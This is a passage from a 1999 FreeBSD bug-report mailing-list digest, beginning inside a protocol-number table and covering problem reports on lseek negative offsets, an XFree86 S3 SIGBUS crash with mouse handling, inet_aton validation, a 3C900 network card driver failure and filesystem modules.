protocol [PUP,XEROX] argus 13 ARGUS # ARGUS [RWS4] emcon 14 EMCON # EMCON [BN7] xnet 15 XNET # Cross Net Debugger [IEN158,JFH2] chaos 16 CHAOS # Chaos [NC3] udp 17 UDP # user datagram protocol [RFC768,JBP] mux 18 MUX # Multiplexing [IEN90,JBP] dcnmeas 19 DCN-MEAS # DCN Measurement Subsystems [DLM1] hmp 20 HMP # host monitoring protocol [RFC869,RH6] prm 21 PRM # Packet Radio Measurement [ZSU] xns-idp 22 XNS-IDP # Xerox NS IDP [ETHERNET,XEROX] trunk1 23 TRUNK-1 # Trunk-1 [BWB6] trunk2 24 TRUNK-2 # Trunk-2 [BWB6] leaf1 25 LEAF-1 # Leaf-1 [BWB6] leaf2 26 LEAF-2 # Leaf-2 [BWB6] rdp 27 RDP # "reliable datagram" protocol [RFC908,RH6] irtp 28 IRTP # Internet Reliable Transaction [RFC938,TXM] iso-tp4 29 ISO-TP4 # ISO Transport Protocol class 4 [RFC905,RC77] netblt 30 NETBLT # Bulk Data Transfer Protocol [RFC969,DDC1] mfensp 31 MFE-NSP # MFE Network Services Protocol [MFENET,BCH2] meritinp 32 MERIT-INP # MERIT Internodal Protocol [HWB] sep 33 SEP # Sequential Exchange Protocol [JC120] 3pc 34 3PC # Third Party Connect Protocol [SAF3] idpr 35 IDPR # Inter-Domain Policy Routing Protocol [MXS1] xtp 36 XTP # Xpress Tranfer Protocol [GXC] ddp 37 DDP # Datagram Delivery Protocol [WXC] idpr-cmtp 38 IDPR-CMTP # IDPR Control Message Transport [MXS1] tp++ 39 TP++ # TP++ Transport Protocol [DXF] il 40 IL # IL Transport Protocol [Presotto] ipv6 41 IPV6 # ipv6 [Deering] sdrp 42 SDRP # Source Demand Routing Protocol [DXE1] ipv6-route 43 IPV6-ROUTE # routing header for ipv6 [Deering] ipv6-frag 44 IPV6-FRAG # fragment header for ipv6 [Deering] idrp 45 IDRP # Inter-Domain Routing Protocol [Sue Hares] rsvp 46 RSVP # Resource ReSerVation Protocol [Bob Braden] gre 47 GRE # General Routing Encapsulation (RFC 1702) [Tony Li] mhrp 48 MHRP # Mobile Host Routing Protocol [David Johnson] bna 49 BNA # BNA [Gary Salamon] esp 50 ESP # encapsulating security payload for ipv6 [RFC1827] ah 51 AH # authentication header for ipv6 [RFC1826] inlsp 52 I-NLSP # Integrated Net Layer Security TUBA [GLENN] swipe 53 SWIPE # IP with Encryption [JI6] narp 54 NARP # NBMA Address Resolution Protocol [RFC1735] mobile 55 MOBILE # IP Mobility [Perkins] tlsp 56 TLSP # Transport Layer Security Protocol [Oberg] skip 57 SKIP # SKIP [Markson] ipv6-icmp 58 IPV6-ICMP # ICMP for IPv6 [RFC1883] ipv6-nonxt 59 IPV6-NONXT # no next header for ipv6 [RFC1883] ipv6-opts 60 IPV6-OPTS # destination options for ipv6 [RFC1883] cftp 62 CFTP # CFTP [CFTP,HCF2] satexpak 64 SAT-EXPAK # SATNET and Backroom EXPAK [SHB] kryptolan 65 KRYPTOLAN # Kryptolan [PXL1] rvd 66 RVD # MIT Remote Virtual Disk Protocol [MBG] ippc 67 IPPC # Internet Pluribus Packet Core [SHB] satmon 69 SAT-MON # SATNET Monitoring [SHB] visa 70 VISA # VISA Protocol [GXT1] ipcv 71 IPCV # Internet Packet Core Utility [SHB] cpnx 72 CPNX # Computer Protocol Network Executive [DXM2] cphb 73 CPHB # Computer Protocol Heart Beat [DXM2] wsn 74 WSN # Wang Span Network [VXD] pvb 75 PVP # Packet Video Protocol [SC3] brsatmon 76 BR-SAT-MON # Backroom SATNET Monitoring [SHB] sunnd 77 SUN-ND # SUN ND PROTOCOL-Temporary [WM3] wbmon 78 WB-MON # WIDEBAND Monitoring [SHB] wbexpak 79 WB-EXPAK # WIDEBAND EXPAK [SHB] isoip 80 ISO-IP # ISO Internet Protocol [MTR] vmtp 81 VMTP # Versatile Message Transport securevmtp 82 SECURE-VMTP # SECURE-VMTP [DRC3] vines 83 VINES # VINES [BXH] ttp 84 TTP # TTP [JXS] nsfnet-igp 85 NSFNET-IGP # NSFNET-IGP [HWB] dgp 86 DGP # Dissimilar Gateway Protocol [DGP,ML109] tcf 87 TCF # TCF [GAL5] eigrp 88 EIGRP # EIGRP [CISCO,GXS] ospf 89 OSPFIGP # Open Shortest Path First IGP [RFC1583,JTM4] spriterpc 90 Sprite-RPC # Sprite RPC Protocol [SPRITE,BXW] larp 91 LARP # Locus Address Resolution Protocol [BXH] mtp 92 MTP # Multicast Transport Protocol [SXA] ax25 93 AX.25 # AX.25 Frames [BK29] ipip 94 IPIP # Yet Another IP encapsulation [JI6] micp 95 MICP # Mobile Internetworking Control Pro. [JI6] sccsp 96 SCC-SP # Semaphore Communications Sec. Pro. [HXH] etherip 97 ETHERIP # Ethernet-within-IP Encapsulation [RXH1] encap 98 ENCAP # Yet Another IP encapsulation [RFC1241,RXB3] gmtp 100 GMTP # GMTP [RXB5] ifmp 101 IFMP # Ipsilon Flow Management Protocol [Hinden] pnni 102 PNNI # PNNI over IP [Callon] pim 103 PIM # Protocol Independent Multicast [Farinacci] aris 104 ARIS # ARIS [Feldman] scps 105 SCPS # SCPS [Durst] qnx 106 QNX # QNX [Hunter] an 107 A/N # Active Networks [Braden] ipcomp 108 IPComp # IP Payload Compression Protocol [RFC2393] snp 109 SNP # Sitara Networks Protocol [Sridhar] compaqpeer 110 # Compaq-Peer Compaq Peer Protocol [Volpe] ipxinip 111 IPX-in-IP IPXIP # IPX in IP [Lee] vrrp 112 VRRP # Virtual Router Redundancy Protocol [Hinden] pgm 113 PGM # PGM Reliable Transport Protocol [Speakman] l2tp 115 L2TP # Layer Two Tunneling Protocol [Aboba] ddx 116 DDX # D-II Data Exchange (DDX) [Worley] iatp 117 IATP # Interactive Agent Transfer Protocol [Murphy] stp 118 STP # Schedule Transfer Protocol [JMP] srp 119 SRP # SpectraLink Radio Protocol [Hamilton] uti 120 UTI # UTI [Lothberg] smp 121 SMP # Simple Message Protocol [Ekblad] sm 122 SM # SM [Crowcroft] ptp 123 PTP # Performance Transparency Protocol [Welzl] isisip 124 ISISIP # ISIS over IPv4 [Przygienda] fire 125 FIRE # [Partridge] crtp 126 CRTP # Combat Radio Transport Protocol [Sautter] crudp 127 CRUDP # Combat Radio User Datagram [Sautter] sscopmce 128 SSCOPMCE # [Waber] divert 254 DIVERT # Divert pseudo-protocol [FreeBSD] >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 1:50:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0C8B914F4A for ; Thu, 9 Sep 1999 01:50:09 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA81477; Thu, 9 Sep 1999 01:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 01:50:01 -0700 (PDT) Message-Id: <199909090850.BAA81477@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Dag-Erling Smorgrav Subject: Re: kern/6184: No error if resulting file pos in lseek is negative Reply-To: Dag-Erling Smorgrav Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/6184; it has been noted by GNATS. From: Dag-Erling Smorgrav To: jkoshy@FreeBSD.org Cc: FreeBSD-gnats-submit@FreeBSD.org, phk@FreeBSD.org Subject: Re: kern/6184: No error if resulting file pos in lseek is negative Date: 09 Sep 1999 10:42:04 +0200 jkoshy@FreeBSD.org writes: > The patch given in the PR seems fine. I've touched it up a little to > avoid some style nits and have reworded the manual page to make the > behaviour clearer. A small test program is included. Hmf, I had totally forgotten this PR. Took me a while to remember what it was about and why it concerned me :) There's a reason why I didn't commit that patch - I don't remember the details, but I vaguely recall someone convincing me that returning an error was not necessarily the right thing. It's been so long I'd have to search the archives to find out for sure. This took me back a long way, BTW - I'd only had commits for something like a month and a half when I wrote this :) DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 2:50:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 95D8415024; Thu, 9 Sep 1999 02:50:16 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA89253; Thu, 9 Sep 1999 02:49:36 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Thu, 9 Sep 1999 02:49:36 -0700 (PDT) From: Message-Id: <199909090949.CAA89253@freefall.freebsd.org> To: hetzels@westbend.net, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/13647: Enhancement to PKG_INSTALL tools (3.2-STABLE) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Enhancement to PKG_INSTALL tools (3.2-STABLE) State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Thu Sep 9 02:48:23 PDT 1999 State-Changed-Why: Duplicate of PR 13649. Two separate patches for RELENG_3 and HEAD aren't needed, because commits always go into HEAD first and are later merged back into RELENG_3. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 2:50:37 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B8CA014C32 for ; Thu, 9 Sep 1999 02:50:33 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA89283; Thu, 9 Sep 1999 02:50:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 9 Sep 1999 02:50:02 -0700 (PDT) Message-Id: <199909090950.CAA89283@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Subject: Re: kern/6184: No error if resulting file pos in lseek is negative Reply-To: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/6184; it has been noted by GNATS. From: To: Dag-Erling Smorgrav Cc: FreeBSD-gnats-submit@freebsd.org, phk@freebsd.org, bde@freebsd.org Subject: Re: kern/6184: No error if resulting file pos in lseek is negative Date: Thu, 9 Sep 1999 02:42:26 -0700 (PDT) > There's a reason why I didn't commit that patch - I don't remember the > details, but I vaguely recall someone convincing me that returning an > error was not necessarily the right thing. It's been so long I'd have > to search the archives to find out for sure. As it stands, the patch is not correct because we need to be able to lseek to half-way of a 64 bit address range after opening /dev/[k]mem. POSIX allows negative file offsets for special devices. {ISO/IEC 9945-1:1996 Rationale [B.6.5.3]}. OpenBSD solves this problem by allowing negative file offsets if the file descriptor refers to a character device. NetBSD has a VOP_SEEK() operation and defers checking of the validity of the offset to its lower layers. IMO, the NetBSD way is correct because EINVAL is supposed to be returned if an 'invalid offset' results from the attempted lseek(), and different filesystems can have different 'invalid offsets'. For now I'm testing a simple version which checks for character devices and allows negative offsets. Regards, Koshy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 3:30:24 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 25B111515B for ; Thu, 9 Sep 1999 03:30:19 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA96491; Thu, 9 Sep 1999 03:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from richard.eu.org (osf-dial3.taide.lt [193.219.244.167]) by hub.freebsd.org (Postfix) with ESMTP id 09F5F159A7 for ; Thu, 9 Sep 1999 03:29:34 -0700 (PDT) (envelope-from rch@richard.eu.org) Received: (from rch@localhost) by richard.eu.org (8.9.3/8.9.3) id MAA00528; Thu, 9 Sep 1999 12:23:11 +0200 (CEST) (envelope-from rch) Message-Id: <199909091023.MAA00528@richard.eu.org> Date: Thu, 9 Sep 1999 12:23:11 +0200 (CEST) From: rch@writeme.com Reply-To: rch@writeme.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: i386/13655: sysmouse, signal 10 and XF86_S3 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13655 >Category: i386 >Synopsis: sysmouse, signal 10 and XF86_S3 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Sep 9 03:30:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Ricardas Cepas >Release: FreeBSD 3.2-STABLE i386 >Organization: >Environment: ktrace: 679 XF86_S3 RET read 1232/0x4d0 679 XF86_S3 CALL read(0x6,0x82c0008,0x225c) 679 XF86_S3 GIO fd 6 read 8796 bytes "\a8\0\0\^O<\0\0\^_>\0\0>\^_\0\0ü\^O\0\0ø\a\0\0ð\^C\0\0ð\^C\0\0ø\a\0\0ü\^O\0\0>\^_\0\0\^_>\0\0\^O<\0\0\a8\0\0\^Oð\0\ \0\^_ø\0\0?ü\0\0\^?þ\0\0þ\^?\0\0ü?\0\0ø\^_\0\0ð\^O\0\0ð\^O\0\0ø\^_\0\0ü?\0\0þ\^?\0\0\^?þ\0\0?ü\0\0\^_ø\0\0\^Oð\0\0\ ................. \08\0\0\08\0\0\08\0\0\08\0\0\08\0\0\0|\0\0\0ÿ\^A\0\0ÿ\^A\0\0ï\^A\0\0" 679 XF86_S3 RET read 8796/0x225c 679 XF86_S3 CALL break(0x82c4000) 679 XF86_S3 RET break 0 679 XF86_S3 CALL break(0x82c5000) 679 XF86_S3 RET break 0 679 XF86_S3 CALL gettimeofday(0xbfbfd30c,0) 679 XF86_S3 RET gettimeofday 0 679 XF86_S3 CALL select(0x80,0x82613e0,0,0,0xbfbfd358) 679 XF86_S3 RET select 1 679 XF86_S3 CALL read(0x3,0xbfbfd204,0x40) 679 XF86_S3 RET read -1 errno 35 Resource temporarily unavailable 679 XF86_S3 CALL read(0x5,0xbfbfd1f4,0x40) 679 XF86_S3 GIO fd 5 read 16 bytes "\M^G\0\0\^A\0\0\0\^?\M^G\0\0\^A\0\0\0\^?" 679 XF86_S3 RET read 16/0x10 679 XF86_S3 PSIG SIGBUS caught handler=0x80c3e0c mask=0x0 code=0x1d 679 XF86_S3 CALL sigaction(0xa,0xbfbfd128,0xbfbfd11c) 679 XF86_S3 RET sigaction 0 679 XF86_S3 CALL write(0x2,0xbfbfc9e8,0x15) 679 XF86_S3 GIO fd 2 wrote 21 bytes " Fatal server error: " 679 XF86_S3 RET write 21/0x15 679 XF86_S3 CALL write(0x2,0xbfbfc9f0,0x23) 679 XF86_S3 GIO fd 2 wrote 35 bytes "Caught signal 10. Server aborting dmesg: Copyright (c) 1992-1999 FreeBSD Inc. Copyright (c) 1982, 1986, 1989, 1991, 1993 The Regents of the University of California. All rights reserved. FreeBSD 3.2-STABLE #3: Thu Sep 9 10:32:05 CEST 1999 root@richard.eu.org:/usr/src/sys/compile/MYKERNEL Timecounter "i8254" frequency 1193182 Hz Timecounter "TSC" frequency 448802837 Hz CPU: Pentium III (448.80-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x673 Stepping=3 Features=0x383f9ff,> real memory = 67108864 (65536K bytes) avail memory = 62394368 (60932K bytes) Bad SMBIOS table checksum! Preloaded elf kernel "kernel" at 0xc02bb000. Probing for devices on PCI bus 0: chip0: rev 0x03 on pci0.0.0 chip1: rev 0x03 on pci0.1.0 chip2: rev 0x02 on pci0.7.0 ide_pci0: rev 0x01 on pci0.7.1 chip3: rev 0x02 on pci0.7.3 vga0: rev 0x16 int a irq 255 on pci0.8.0 Probing for devices on PCI bus 1: Probing for PnP devices: CSN 1 Vendor ID: ESS1868 [0x68187316] Serial 0xffffffff Comp ID: @@@0000 [0x00000000] ESS1868 (rev 11) pcm1 (ESS1868 sn 0xffffffff) at 0x220-0x22f irq 10 drq 1 on isa Probing for devices on the ISA bus: sc0 on isa sc0: VGA color <16 virtual consoles, flags=0x0> atkbdc0 at 0x60-0x6f on motherboard atkbd0 irq 1 on isa psm0 not found sio0 at 0x3f8-0x3ff irq 4 flags 0x10 on isa sio0: type 16550A sio1 at 0x2f8-0x2ff irq 3 on isa sio1: type 16550A sio2 at 0x3e8-0x3ef irq 5 on isa sio2: type 16550A psm0 not found at 0x60 pcm0 not probed due to drq conflict with pcm1 at 1 fdc0 at 0x3f0-0x3f7 irq 6 drq 2 on isa fdc0: FIFO enabled, 8 bytes threshold fd0: 1.44MB 3.5in wdc0 at 0x1f0-0x1f7 irq 14 on isa wdc0: unit 0 (wd0): , DMA, 32-bit, multi-block-16 wd0: 3077MB (6303024 sectors), 6253 cyls, 16 heads, 63 S/T, 512 B/S wdc0: unit 1 (atapi): , removable, accel, ovlap, dma, iordis acd0: drive speed 5512KB/sec, 128KB cache acd0: supported read types: CD-R, CD-RW, CD-DA, packet track acd0: Audio: play, 256 volume levels acd0: Mechanism: ejectable tray acd0: Medium: CD-ROM 120mm data disc loaded, unlocked wdc1 at 0x170-0x177 irq 15 on isa wdc1: unit 0 (wd2): , 32-bit wd2: 329MB (675360 sectors), 670 cyls, 16 heads, 63 S/T, 512 B/S ppc0 at 0x378 irq 7 flags 0x40 on isa ppc0: Generic chipset (NIBBLE-only) in COMPATIBLE mode lpt0: on ppbus 0 lpt0: Interrupt-driven port ppi0: on ppbus 0 plip0: on ppbus 0 vga0 at 0x3b0-0x3df maddr 0xa0000 msize 131072 on isa npx0 msize 65536 on motherboard npx0: INT 16 interface IP packet filtering initialized, divert disabled, rule-based forwarding disabled, default to accept, logging limited to 50000 packets/entry ccd0-3: Concatenated disk drivers changing root device to wd0s1a pid 510 (XF86_S3), uid 0: exited on signal 6 pid 534 (XF86_S3), uid 0: exited on signal 6 pid 553 (XF86_S3), uid 0: exited on signal 6 pid 571 (XF86_S3), uid 0: exited on signal 6 pid 606 (XF86_S3), uid 0: exited on signal 6 pid 645 (XF86_S3), uid 0: exited on signal 6 pid 652 (XF86_S3), uid 0: exited on signal 6 pid 679 (XF86_S3), uid 0: exited on signal 6 KERNEL: machine "i386" cpu "I586_CPU" cpu "I686_CPU" ident MYKERNEL maxusers 32 options "MAXMEM=(64*1024)" options "NTIMECOUNTER=10" options INET #InterNETworking options FFS #Berkeley Fast Filesystem options FFS_ROOT #FFS usable as root device [keep this!] options MFS #Memory Filesystem options MFS_ROOT #MFS usable as root device, "MFS" req'ed options NFS #Network Filesystem options NFS_ROOT #NFS usable as root device, "NFS" req'ed options QUOTA #enable disk quotas options MSDOSFS #MSDOS Filesystem options "EXT2FS" options "CD9660" #ISO 9660 Filesystem options "CD9660_ROOT" #CD-ROM usable as root. "CD9660" req'ed options PROCFS #Process filesystem options "COMPAT_43" #Compatible with BSD 4.3 [KEEP THIS!] options SCSI_DELAY=15000 #Be pessimistic about Joe SCSI device options UCONSOLE #Allow users to grab the console options FAILSAFE #Be conservative options USERCONFIG #boot -c editor options VISUAL_USERCONFIG #visual boot -c editor config kernel root on wd0 controller isa0 controller pnp0 controller pci0 controller fdc0 at isa? port "IO_FD1" bio irq 6 drq 2 vector fdintr disk fd0 at fdc0 drive 0 disk fd1 at fdc0 drive 1 controller wdc0 at isa? port "IO_WD1" bio irq 14 vector wdintr disk wd0 at wdc0 drive 0 flags 0xA0ff disk wd1 at wdc0 drive 1 flags 0xA0ff controller wdc1 at isa? port "IO_WD2" bio irq 15 vector wdintr disk wd2 at wdc1 drive 0 flags 0xA0ff disk wd3 at wdc1 drive 1 flags 0xA0ff options ATAPI #Enable ATAPI support for IDE bus options ATAPI_STATIC #Don't do it as an LKM options IDE_DELAY=8000 # Be optimistic about Joe IDE device device acd0 controller atkbdc0 at isa? port IO_KBD tty device atkbd0 at isa? tty irq 1 device psm0 at isa? tty irq 12 device vga0 at isa? port ? conflicts pseudo-device splash device sc0 at isa? tty options MAXCONS=16 # number of virtual consoles options "SC_MOUSE_CHAR=0x03" options "STD8X16FONT" # Compile font in makeoptions "STD8X16FONT"="lat4" options SC_HISTORY_SIZE=700 # number of history buffer lines device npx0 at isa? port "IO_NPX" iosiz 65536 irq 13 vector npxintr device sio0 at isa? port "IO_COM1" flags 0x10 tty irq 4 vector siointr device sio1 at isa? port "IO_COM2" tty irq 3 vector siointr device sio2 at isa? port "IO_COM3" tty irq 5 vector siointr device ppc0 at isa? port? flags 0x40 net irq 7 controller ppbus0 device lpt0 at ppbus? device plip0 at ppbus? device ppi0 at ppbus? device xl0 device pcm0 at isa? port ? tty irq 10 drq 1 flags 0x0 vector pcmintr pseudo-device loop pseudo-device bpfilter 4 #Berkeley packet filter pseudo-device ether pseudo-device ppp 1 options PPP_BSDCOMP #PPP BSD-compress support options PPP_DEFLATE #PPP zlib/deflate/gzip support options IPFIREWALL #firewall options IPFIREWALL_VERBOSE #print information about # dropped packets options "IPFIREWALL_VERBOSE_LIMIT=50000" #limit verbosity options IPFIREWALL_DEFAULT_TO_ACCEPT #allow everything by default pseudo-device tun 1 pseudo-device pty 16 #Pseudo ttys - can go as high as 256 pseudo-device gzip #Exec gzipped a.out's pseudo-device vn #Vnode driver (turns a file into a device) pseudo-device snp 3 #Snoop device - to look at pty/vty/etc.. pseudo-device ccd 4 #Concatenated disk driver options KTRACE #kernel tracing options SYSVSHM options SYSVSEM options SYSVMSG options "VM86" XFree86 Version 3.3.3.1 / X Window System (protocol Version 11, revision 0, vendor release 6300) Release Date: December 29 1998 If the server is older than 6-12 months, or if your card is newer than the above date, look for a newer version before reporting problems. (see http://www.XFree86.Org/FAQ) Operating System: FreeBSD 3.0-CURRENT i386 [ELF] Configured drivers: S3: accelerated server for S3 graphics adaptors (Patchlevel 0) newmmio, mmio_928, s3_generic Using syscons driver with X support (version 2.0) (using VT number 12) XF86Config: /etc/XF86Config (**) stands for supplied, (--) stands for probed/default values (**) XKB: rules: "xfree86" (**) XKB: model: "pc102" (**) XKB: layout: "lt" (**) XKB: options: "grp:shift_toggle" (**) Mouse: type: SysMouse, device: /dev/mouse, buttons: 3 (**) S3: Graphics device ID: "S3Trio64V2" (**) S3: Monitor ID: "500PST" (**) FontPath set to "inet/127.0.0.1:7100" (--) S3: PCI: Trio64V2 rev 16, Linear FB @ 0xe4000000 (--) S3: chipset: Trio64V2/DX rev. 16 (--) S3: chipset driver: newmmio (--) S3: card type: PCI (--) S3: videoram: 4096k (--) S3: Ramdac type: s3_trio64v2 (--) S3: Ramdac speed: 170 MHz (--) S3: Using Trio64V2 programmable clock (MCLK 50.114 MHz) (--) S3: Maximum allowed dot-clock: 170.000 MHz (**) S3: Mode "1024x768": mode clock = 155.000 (**) S3: Using 16 bpp. Color weight: 565 (--) S3: Virtual resolution set to 1024x768 (--) S3: Local bus LAW is 0xE4000000 (--) S3: Using a banksize of 4096k, line width of 1024 (--) S3: Using a single 64x64 area at (960,769) for expanding pixmaps (--) S3: Using 16 planes of 1024x1215 at (0,833) aligned 8 as font cache Fatal server error: Caught signal 10. Server aborting Mouse: plain serial Genius 3 button, works as `auto', `mouseman' and `microsft' I don't have sio3 enabled in kernel. FreeBSD 3.2-STABLE * $Id: atkbd_isa.c,v 1.2.2.1 1999/05/09 11:02:04 yokota Exp $ * $Id: psm.c,v 1.60.2.1 1999/06/03 12:41:13 yokota Exp $ >Description: I have been runnig the same version of X and FreeBSD 3.2 and everything worked on console and X. Now after reboot ( I don't change nothing ???) mouse still works under console but when I start X and try to move mouse I get SIGBUS. I can run X if I kill moused and use /dev/cuaa0 as mouseman mouse port. >How-To-Repeat: Run XF86_S3 ? >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 9:20:46 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D85E0151B3; Thu, 9 Sep 1999 09:20:42 -0700 (PDT) (envelope-from fenner@FreeBSD.org) Received: (from fenner@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA82075; Thu, 9 Sep 1999 09:19:43 -0700 (PDT) (envelope-from fenner@FreeBSD.org) Date: Thu, 9 Sep 1999 09:19:43 -0700 (PDT) From: Message-Id: <199909091619.JAA82075@freefall.freebsd.org> To: xaa@xaa.iae.nl, fenner@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/13628: inet_aton doesn't check valid addresses well enough Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: inet_aton doesn't check valid addresses well enough State-Changed-From-To: open->closed State-Changed-By: fenner State-Changed-When: Thu Sep 9 09:18:39 PDT 1999 State-Changed-Why: misc/10231 reports the same problem; Adrian's solution addresses Mark's problem. Now we just have to get the fix into the tree... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 10: 1: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 05DBE15143 for ; Thu, 9 Sep 1999 10:01:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA85357; Thu, 9 Sep 1999 10:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id EC71F1518B; Thu, 9 Sep 1999 09:50:50 -0700 (PDT) Message-Id: <19990909165050.EC71F1518B@hub.freebsd.org> Date: Thu, 9 Sep 1999 09:50:50 -0700 (PDT) From: dave@dugard.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/13665: xl driver does not work with 3C900 10-T cards. It only works with 3c90x 10/100 cards Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13665 >Category: misc >Synopsis: xl driver does not work with 3C900 10-T cards. It only works with 3c90x 10/100 cards >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Sep 9 10:00:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Dave Dugard >Release: 4.0 Current >Organization: >Environment: FreeBSD phooey.dugard.org 4.0-CURRENT FreeBSD 4.0-CURRENT #7: Thu Sep 9 12:31:28 GMT 1999 dave@phooey.dugard.org:/usr/src/sys/compile/phooey2 i386 >Description: Machine started rebooting right after it looked at the NIC after make world and then the kernel config. After reading /sys/i386/conf/LINT about the MII bus device I guessed that it might be a problem with 3c900. So I swapped out the 3c900 with a spare 3c905 10/100 card. The stop and reboot problem cleared up. As an experement I put the old card back in a booted off a 3.2 Generic kernel. The system came right up. But the 4.0 kernel still rebooted after the card init. The 3c900 card is in another system now working properly. I kept the 3c905 in this system. It looks like it does not like the non-10/100 cards. >How-To-Repeat: Load the xl and MII with a 3c900 10-T card >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Sep 9 10:30:43 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0701A15274 for ; Thu, 9 Sep 1999 10:30:41 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA88281; Thu, 9 Sep 1999 10:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from assaris.sics.se (assaris.sics.se [193.10.66.108]) by hub.freebsd.org (Postfix) with ESMTP id 184E8151BA for ; Thu, 9 Sep 1999 10:26:19 -0700 (PDT) (envelope-from assar@sics.se) Received: (from assar@localhost) by assaris.sics.se (8.9.3/8.7.3) id TAA04502; Thu, 9 Sep 1999 19:26:30 +0200 (CEST) Message-Id: <199909091726.TAA04502@assaris.sics.se> Date: Thu, 9 Sep 1999 19:26:30 +0200 (CEST) From: Assar Westerlund Reply-To: assar@sics.se To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/13666: buggy filesystems are built as modules Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13666 >Category: kern >Synopsis: buggy filesystems are built as modules >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Sep 9 10:30:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Assar Westerlund >Release: FreeBSD 4.0-CURRENT i386 (and earlier) >Organization: none >Environment: This happens on both 4.0-CURRENT and 3.2 